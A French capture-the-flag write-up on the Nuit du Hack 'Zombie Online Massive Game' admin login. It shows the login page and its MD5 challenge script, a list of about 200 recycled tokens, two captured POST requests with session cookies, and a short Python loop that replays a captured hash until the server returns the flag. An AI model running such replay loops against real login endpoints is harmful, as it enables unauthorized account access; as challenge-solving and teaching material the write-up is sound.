On se retrouve face à un site web exposant une page d'authentification (formulaire admin). De plus, l'énoncé nous fournit une capture réseau (pcap) d'une session TCP vers ce site.
<!-- Captured login page of the challenge target. The challenge value (zomgToken)
     is shipped in clear text inside the page, so anyone who fetches it sees it. -->
<html>
  <head>
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <title>Zombie Online Massive Game :: Admin</title>
    <script src="zomg.js"></script>
  </head>
  <body>
    <!-- Page-level global consumed by zomgDoAuth() in zomg.js. -->
    <script>var zomgToken='gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3';</script>
    <div id="login_form">
      <div id="login_top"> </div>
      <div id="login_alert"> </div>
      <div id="login_fields">
        <!-- Empty action: the POST goes back to the same URL. -->
        <form method="POST" action="">
          <label for="username">Username:</label>
          <input id="username" name="username" type="text"/><br/>
          <label for="password">Password:</label>
          <input id="password" name="password" type="password"/>
        </form>
        <!-- The button is outside the form; clicking it runs zomgDoAuth(),
             which rewrites the password field and submits the form. -->
        <button id="login_button" onclick="javascript:zomgDoAuth()"></button>
      </div>
      <div id="login_bottom"></div>
    </div>
  </body>
</html>
/* ZOMG JS resources */
// var CryptoJS — shorthand for the CryptoJS library (used here to compute hashes)

/* zomg authenticate hook
 *
 * Called from the login button. When both fields are non-empty, replaces the
 * password field with MD5(zomgToken + ':' + username + ':' + password) and
 * submits the first form of the page, so the server receives the hash rather
 * than the clear-text password.
 *
 * Security note: zomgToken is a global embedded in the HTML, hence public, and
 * MD5 is an unkeyed hash. The scheme is therefore only as strong as the
 * unpredictability and single use of the token: if the server reuses a token,
 * a previously captured (username, hash) pair can simply be replayed.
 */
function zomgDoAuth() {
  var form = document.forms[0];
  var user = document.getElementById('username').value;
  var pwdField = document.getElementById('password');
  var pwd = pwdField.value;

  // Nothing is sent while either field is empty.
  if (!(user.length > 0 && pwd.length > 0)) {
    return;
  }

  /* compute challenge answer */
  var challenge = zomgToken + ':' + user + ':' + pwd;
  pwdField.value = CryptoJS.MD5(challenge);
  form.submit();
}
Bref, rien de bien compliqué à comprendre sur la page. Juste avant l'envoi du formulaire, le script calcule le MD5 de la chaîne token:username:password — le « token » n'est pas un cookie mais une valeur embarquée en clair dans la page HTML (variable zomgToken) — puis remplace le champ mot de passe par ce hash et soumet le formulaire. Le serveur ne reçoit donc jamais le mot de passe en clair, seulement MD5(token:login:mot de passe).
Le token semble aléatoire, mais il n'en est rien : en rechargeant la page plusieurs fois, on constate qu'il n'existe qu'environ 200 tokens différents. C'est bien trop peu pour un défi (challenge) censé être unique et imprévisible : la réponse calculée pour un token donné redevient valable chaque fois que le serveur ressert ce même token.
Liste des tokens
:r]x]b5bv.,5ao6weahqnaiq-e2a1nqv[3]mlsge 29.,,ndwn4ny8]qeq9m[heu=$[di$dlwozwebn.n :8,54d9=[6fehbf[m9k48p$psc8:ckh$g9!!2-q1 14ca8qf0:l=k9mg3kb31d8[quulv[vum9n78hs]p _g=4fvsi5_q6$$:pj6[,84wmzab-4[c4l7,=75.f 8!6:dl=2wfavl$d4j2hu1]9k=6,z3e,1q$2!!mj$ xhcg8p$k![kuy$_y,85gi0.toferm,8l7r[9[36_ jx,=y7c=oz553jiqs=$bc$zonxuqx-omanembq,6 jjyyb.eo-dd47,9uv7fl-03p-$=y688:heb=!lw0 l7d24cpywb81:vqht7q7zu[.emgc=]ojx3f6-ste s=h!_z!by7pwq5df-r-te:y99ljh].b=2.17]gl, 7n_pialz1h.v]1laosfeeyts.tp1j83d_i3il1z0 :_zul:$u-=]n!!sp[!9klvl]js:rsjipjm!a0!z9 ]u2t.q]g:dj0g8rs3[nw3mr-wrx]5--mpqvbvpqa c_ldo8_.q6pp4][ttu=rf]g7-gy[3q3q49w-qc[$ ,ng61jccvx-tr97:63m$vg32lm,psjfp.mtvgb$3 lzum_26073c::tr:$j[]8]2u2_ko!gxibkkar5s$ h$3va=n71i5oiwlhus=j97xggeh=3$n!e:4_e-42 8v:or.ju9ie:g:4scd7v=g3m=b-pig9j$7yu!mfy kgsqk-1ue5$z5.m.3z54m2uckemzp872me,zsvxn t9vozvrim0hnx9g0ecc0vy-8bzh_5kjpy6q,neot uv,$k$roj-ov7x,kx3a4[.rolqd[0b]0skaxp8_m !z,ns8z8v5.]2]vi9fg9[50213q:it.7y_2ms13: 1y1dk:t.65pb48gju,mej!rd1].h:$dz44vtyest u,qwmkpojm!agdozdl2jj,noq5lj[q[,g0x=:8u, tc:rq$9pv-3z:=lp]:q8agmor37m8br2mt8vbrgk f!g0g[kp,n.4wy!ul49k.]sf2hqd!ed!xjtw1tla 3c!q.h-]e2j5t1xsefj$0sroo2y-1cd5e=2i-1rx s9,,8x!sv[[]3vrbi6m9b.6k97[$$sfc$6hvqjf3 j8heb9jxjs2ecfbxe5jtjhudff-$p4xy_:f-8ncu wknxl1uff8-nyo3:nzybozq9m,6f7o=qws4mte7t x-kp3lct44qt.6fpozfjvx9er:$vz0golj!]ot2w 5bk$n$18.r.tuye6f3ey:c3.$ynvv9yfzmjl,-d- a]a3r,=-ggo3ml73d:v9i4s6r.b5j2e.v4ef-!a4 [i_,evq5],!1aubm9od6[m49:6a[=pz_gr=-wf5g -00y4ws4:kxaab-q05x[$dnb=]l5:axjo-$r1_3p -f6qohip0ql316htxo$=8lb.r[itai=b]!9j0nnw zuy0a:_ytout8x8lyq28ob4n[o2fz:v1$egvzcvn o3x]gwtrh,9nx2fu$[ac]nvbvghnw7fpvp[4.=dn 0,nyp.v]c$_881-2a4if0se4ogbco913b8p=z,07 rtukmo2x$zrj!=og4.e9xjjwo-xcygi99-cm9y4_ ro-k=]u2!:b5q-wg_xf]px3w00p_70]pd,pabwoh z,8-g9s5b4[vhs6572k33!r.9931x7i$!qizo!2h [t1:1f,5_:jvhz,ygxv]6m7mipd,j.,rna6537oo agr=twmm955=9zp4d:v8wwca0prkf67d.k_.2],$ kctd28l1wcuqc59=[g7-y,z11wo8-3ub.3_y12wo 3o40[$_]wys[xj43e!2a=6]nygl3u!sg]1twsa!i 9[zz0uu[stu=ch3o4q1eolmvu9][gk[3[0_.7v4d 
h3$y2q6qn3$i$m8ipk7al9x1b[fhhmvho]9:szcf 9j9sigb231!8:r9]w_6d-hban7dvpu.oda5z_fqo r4ru=-,p!xn1rj[kscx1.],qyqx_9ov0fti4su:9 gzygzo2fw3qpz_qffsj$i]h!-gt]7b6!!nx,u-px :$t2.glh4ce__3=m_79v!2ddunm7c.j-j7q2g:69 f]3p0prqe40s29-9]6nj62uxqz57mbx4d][mv8n- !m4]bakt]n4c7az,]fzv,,ce8np64mu.jazrqscf dk7nv:ttf81-z[3r!$oufp]:k3,60j[4=rj6br4o yy!2=m[w.ml7b!0[q[.aubjvt0.m1d][=_5vpuew _ycbiop6effran!$_=8[ph7w4ruoy]49zr2=o$:, 8!54zkvgh8i1:u]hz7koj]sts6eu_lensqyzv3a7 p:ixqjtafh:am7g33pr[1puyofu6q6fz=h$kcay3 y-k7j455a3yzku_xacq.$jr[v6cisr-6l34=.id8 .ze2.l=1,i1r,4q4za07hx,aninac7xln0ts8:2n !nh!08fsp33!has9ij9.a_ontgvul.l1nl=wdu79 ot2pn7gxigo58[p-qqi!ka902y5labo,dx2ppp5d ,ck4ipr0uvf4b49_0[6=$$xxz-s9f8:nzw-yu-eo s!st![i73rfyx4:1x7j,wu4]hq0p.gbf-h82[6.! [_hi-uesuhk3oqo:x:af$2dpm4l31ur]_9wk5$kd .l[nx![]2o6e=$wdflwm3puad5=:ccuf=fr6u=_r ylyok72:gi4i6[:mne]e5gv.x3lv$x72n-zd!$:$ 7:l-i9:w:m5-.s,pbe3lnwm[5aey=,p$p-vkg_4: pvfd42cx0].5y7l4]owk8vlyc!5s18j,:w10j2i[ l.y$hlvbst0,tjzi47dje-izssger!zxs-8s5a.5 742j7thyb,$![[m]hfo,egfscsyh9vetnh-7u5ig ac.bp,=8f.318q,qbrqirbct$95mcm51!a!cth,_ 1y1]r[l7_iv]t.r0[q2lzwx-mjwehwwch_p[o.!q terd2yon]klccg6.u:!uf$igk=plqq$k5gk0i$df !37d,$6hjws7yc!=]oqka__a!1p[t-s!.5u.xhm6 vd$5q=ut=013l=og16x7or1u8.d13nm65l.lg]t- 2m[=:ve=,yi:0[l2t4,fm!_ffajfxkj=$ypp$ut5 jjdi4540u:2y=]$k40sndu]$engeej6-m4_ixjkx :i6]4qf0gx5ev]rpw-yf6:uq2=g:6f.68rwp9g5w y$k=5848p3qkx_e$uv$bf:-r]4,n-5nod9cva5f7 0q9y02yrs5493$rjzkxcw8k-4sgc62ww]:qnct93 0r5l=b[j.5f2f]se8,fe_3dsxo!10a2y9[bt6-8w yq982,ou7e31fp=sacq[d_ju-iw[to8avuudvtdn !q6ji$:.=4we:=i6i-:oi0dl,ddiur6sh!i-gv$: hl8,5=[reb8-nhwzhwn3$!t4gb6i9u8q!]bi:3[_ pj8,_0ly!.br9]1c4y_4of[e4c7ziau1h4!m1upg 4.p3bkt[13wd3z2-69njv$cg8.=bf=q8t3[0z4rq ezmrfmp,39rja3r[un-!q0j[g3ngx3gpaqgob6o[ .y=7=gg02nk030nl1d[,a0z=$llc7jr[znfbefg5 hy:dajlwuv6c45e]du_[ee]4i9[n5qqpc2p-t[ye u1:ej.l5ga62:==_d,2zwhm$h9i7!qestg2qzifi jvii$cfuuft=6l5554s0hno,ma24t7jdr..4yme, t4coxr9i0n4!b0-[q:=dv8rjma1q3w921v=ed:m! 
3t5ad50uod.7tz4[ly]ffrov162rn4wr:z==aws] nng46e5q$gxoth_1h.p.3sl778p=r0y_m[1h!1_u kzhf7q:1=a5,xbwc3$o17$bu9la.u38cukkbjl=v [ohien3!jekv-xsgi0jja],34,c8gdi0h5amofcp 9_g$zt_8g=y_jwx.fuo7[jgcn750[t9s8a7!!fpe 0-qhkj$,uooxpdz7t1ut1g,[tjkozuc=774ss.[- yw80mvp,1vws9zvcy1_$r9w,nw5w,bh-!$etv[a1 :ihnoe3.6d!9eica2sf:$t72ag!gmyfi9tmzaz,y 1z19mv2!6ir-5uh$_pghmuaab0r[.rjjr_sr:ozq b$]]-b!dhq,ma.hdn5s9th-_i]hixwth]u!6hx1] 4a9$r:]0k13hv5$3dia!5j]l!bx6xk0=vj:y,f71 5cnz,b6sb=jkv6daaz90xo.1i,0m5qwef]s2rrnu ,!wi8!4o4ho.opwp6ip3xh_.l75howd8xues$fsk 2f!=sgj]w=himvaiuy8$j!lmy.nnsl.-2a:up1.s 8z:1kxuxr=r6!]ivd$g-3noh0_$4vri[fznzv]4= 7xmd26r0.!l=n92emhgku04xx8]qn_bn-p,a[ioz wzluz=p5z]endxsgf4.s]3,5i:dlx$]!22fdhs.y 2-08z]2au!,tkqfobdlmq9i=8gtds13zjo9[u$xp 3nr[um$d!ylc0dfs.g3vt5o4sh5hbyu![bzl:3hp ot5al4q=yfg7-gra,9bgzn-596pm7p=up!:7twaw -fymexz,ogwk5_vvlxlv3[5c1n7j332!wgd,k2eq q8oo0uxsqqfyzlv51xt05ot:b,ngf.cu_m9:jajk leccoo[,fv3ge4djd$$uor15p4mu3860jg[z!t_j 30w52fzmc$2$mlg$z.8160=jevin$sm_ckth$8qi opcrumqmh=x3bwzchcnvj9pufs9=bnzd-[f0uw7v _,.0_[x57=a9lgcedq5bei!7dm:gt4e:8]=kbyfw $twl9c707v4xfo]=o0-ocg0r6bvs4gsc0hnr[-bp ]!552i-is47z!=c5wk,b-j6oiaj9ilf,fr$iwwz[ gak0etv]w4=]9ia_40y:6c!cgm9dfy.hixx2wfn7 3t.9jp_8e6sowc8lizb3==veruitayokd7uh5uj_ .bnq=axrl45i,mo6aiw-hgoc:e$g9d9=viz.qd7r 03e6:ygce-5:0buvdryoxngngydlyofr7nty46a7 $oz9.d0y[4en,:jk_m,o.7zd6ow0if[9777-2z:n 6sho_d-zb8sb,ew06me7exbx0ym.tmjpx[j=_wiu g,6,hcn.,pw39iez:5-wf$g_03weuv7ps!e6yxc3 z.=]-1b][p_gp[4o$gt-xj0,b7d]yh33=43-_qvp n.36!ntk0n0-gi-tlyum7irlq4-j_pp,$fa8m[r3 1a,gbc1:pdv:drol=5klk:-1.iwt-.9vwi_icot[ wgnb,,4g9h0xa08y.pu!vrn7y,ec6inrol39yn[f mpyyebj3d,zfalpwul,a7odz$kh5j,w.6ug3z.9e l2]ld=fe[q,!6sor-9_q1u29313-,5eip!j,st2! 
w=sx0,fp4ij54tqh7u1vl=3m90!yov[4=z0jwt.h _q$wiptmc!0gq$rojmxl]i,3jinbui0yg7x1e=_e j=$bkjl[3m-1jxg,df]9v2616]f-w4g6yxs.ktz5 4e-z86ew477[64oefzn:r:6e8xxq.inwqi8kerg0 m1u1:nmh9x809c8:98qpf.:so-7kobgmgat2lt85 :z$bpqlml[-[f:vxx,9wa5!lm1uplt_9$o2$[7:, gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3 zw93aj:d_nsc]7btu4e!vdwbxsh,xkk1=--fu1l8 ,2=3vmjvcu,_ulfi903xiv,-eb3,w6nyz9kx[otq cay9i:pxmx6,a[is0xer,[[z6.$u065,b:mpyp=, 27=rigbi6s.d7$!d:.b48ev=,n,ta6e..=0n:-c0 bluz.$s1jgnl191aq.12j8rmi[l6_6l_t=o6ho:y dbzlx_=q-9,3rfo9hd$17,!sdjyixazv-:qz-gc$ rz_l,-i[64[ii.i7!b!mn2_,c]hekb]qvqwll[q1 pu]28jv22.djb!tl,lotx77$119vw$lox]q,qdm8 y41q!a.$i7n5w607.b$cwx241_cqa9$3[b!$,sov =-3bx:,ryem0zh78xwsml1bdjt-][f1n5.co$c:g v_ige$kgw04_vd1,:w8xkqttji]dhj238c9d!h.j 477he2c2umakpg.79lu,1u7j[.18ws$!y]_k3[.t 9p$w.k$._izjq2b5-2x!o]_kpmz36qd!wedby:6: fnpw8vo0fnb[n8ai4jtzsdoc00_:kz-yxeurc:c8 9k3[v_o[b10z1do9va4__5pp4l3]oscobzzk73t3 rw-p6e79pjbr-j1p29r9]6u-dgmchk=hknctgwqv yspw$2hzg]p=o$-h4z252hybrqs:ax]_l:v1[irt la=n6g7kh82zl0].ftyai2bh:5hlw-u9=j0[j0af i4grm[z8jzi_usqzlhk7y_x1s!33p.s[=..eyvrz 2ssb2j.pylijqcr6,,3s6t4i.v8,853h$_4a_q]9 t[yqb8525t:l$j4o03m2obar!s.6798f8cm1qk_f =d$1wwwsgq[5-vd93bje9233_zn$m[=kw6c!.a]o nq=lxb7-e2ro4cw_!$0]=,l[93coelr[c5ux9:eg qawb2-zp4w:i6_!5$i5w!isw[jk4_vcwnzjvwgsy ur!1fhpyt[-j$obw$z0$rp6f,$e9h1$]6utlz4mh on7x6=p6fct$:i=qpwp=f]_]_5nwa1a3-fmg:z-w x--0-dg_w2h,:a!dtqur0:keki__uqsmmsj_2beq 7[p31a:xz]i7,cs]bkysq738_i8d$v5w=3p[wd9d ,ylr1ks7ix._t8=8rsdxm]z-ngciq:t1yub-h0uv $,6q34puq,x-,wsf$cfrzf3i2g,o1$a,rzlk5oo0 oiejf!jpii1i$7:fu$lld0![,efkp=yfxz=q-3fp qz2![!wcg__69,y8zf6n:cruzl,c1]bvr:v2kfte 4a2y4u_1!z:l3:uyhe6oasux4]bgev9q[.p:qt3z f,0oe::v5029o:xupo2rn390aq=e0!t,6romx94c 9.soa]b2u:f5swhx069=pmd=y:pzr53b5p[w-1,a =-91$fc:$0r35,hm7p=8wyum:tv8cke36ok4wrvh c,y[,[$z.b:9191r.nu8lk1j6omp!x0rkk3r9mi. 
kq_-iryv6$j85=rs30bju17g..!6]rynf_m:ihw8 iyc:xkv]wyzm46.m4l,x=7our]w-f2$n29oagp2] .9=,hso-wz]i7t9:xx7_,,$n_fga9=3=$,9=tfj1 ]hppbkplt9]dtb=:oqcjl:3qr5[bsw958i4rq=a1 -9e,$p1vt:p4!a]3!05,cy=i_g$fethl9=y7u0,- zqf2$skn6og382q_cz5[pru]uucal,zy7vq3dlv] z]cp4q$5cll[ysy.tc!2t46a6d$is9$3nf1z-288 .iw-lw2:52p6i6-=x=hy-c_nti99n0lj[ci5-nhz ryg8k5vgb5ntjy8szc!hf,!uwv,3xszw$51=4,m7 _vt5bj.pu[i]yyx4l[xp7gey1$8et7e2mm9q2v[. ru=wt_7_[fns900pu3wncf1$hg7!_.3gan1isn9d g7:g_]5eeo,ye,v15b-9e4ky_fd!:p:8q-m$cwc$ ],-oiuflss7boq2xcxq4v76[:0=binhq_moi3c-. .y!y[y[0_v58r9]waogg5!ar25o[]xdc-hao]a9, .c$u]2uy24fc-flutzuyxo_zgx80dauls,ks4r[4 ,c77gh684$_k]c54c=kn3rkzqo14j[!typztrnza k!ihoinfa8zvhh_sah][cagr!:]qiqs_u0d7p4:h ds=f,,bmsyut7j]5q$avh,o777zno,,6]b7k,4c. 09=]e8[b2.yepq5ukgp8wo197rkrh22l4,idqrc] .jhjk!.z4qoj8m6oeobun:,a7ygw-se$c9uy3cqt
La capture TCP renferme une session TCP vers le site en question. On y trouve deux requêtes HTTP POST d'authentification pour le login admin, avec deux hashs différents (vraisemblablement calculés avec deux tokens différents, ou avec deux mots de passe), ainsi qu'une réponse.
POST / HTTP/1.1 Host: public.nuitduhack.com:8009 Origin: http://public.nuitduhack.com:8009 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://public.nuitduhack.com:8009/ Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54 Content-Length: 56 username=admin&password=1349e61e13325795c02ad26b0ab53dda
POST / HTTP/1.1 Host: public.nuitduhack.com:8009 Origin: http://public.nuitduhack.com:8009 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://public.nuitduhack.com:8009/ Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54 Content-Length: 56 username=admin&password=39d7720343ac3430570f202dde3ab803
Nous avons environ 200 tokens ainsi que deux hashs ; l'un des deux correspond probablement au bon mot de passe. Première idée : brute force hors ligne, c'est-à-dire tester, pour chacun des 200 tokens, des candidats de mot de passe jusqu'à obtenir MD5(token:admin:candidat) égal à l'un des hashs. Après avoir attendu un bon moment sans résultat, on commence à se poser des questions : le mot de passe n'est visiblement pas dans nos dictionnaires, ce n'est pas la solution.
Toujours avec nos 200 tokens… Finalement, nul besoin de connaître le mot de passe : le serveur choisit son token parmi ces ~200 valeurs et, si le hash capturé a été calculé avec le token courant, il l'acceptera. Il suffit donc de rejouer la requête POST capturée (login admin + hash) en boucle jusqu'à tomber sur le bon token — une attaque par rejeu classique, rendue possible parce que le défi n'est ni unique ni imprévisible. Hop hop hop, on code ça, et on laisse tourner environ 2 minutes… Et là, oh magie, on obtient le flag :)
#!/usr/bin/env python # encoding: utf-8 import httplib def main(): headers = {"Cookie":"PHPSESSID=9p22omkei1cb5517kk93s5ql53;", "Content-Type":"application/x-www-form-urlencoded"} while True: conn = httplib.HTTPConnection("54.247.160.116:8009") conn.request("POST","/","username=admin&password=39d7720343ac3430570f202dde3ab803",headers) rep = conn.getresponse().read() if rep.count("Flag") > 0: print rep break if __name__ == '__main__': main()
<!-- Server response once the replayed hash matched the current token:
     the login_alert box now carries the flag. -->
<html>
  <head>
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <title>Zombie Online Massive Game :: Admin</title>
    <script src="zomg.js"></script>
  </head>
  <body>
    <div id="login_form">
      <div id="login_top"> </div>
      <div id="login_alert"> Flag: 8f5741fe00598d1463773708f5743285 </div>
      <div id="login_bottom"></div>
    </div>
  </body>
</html>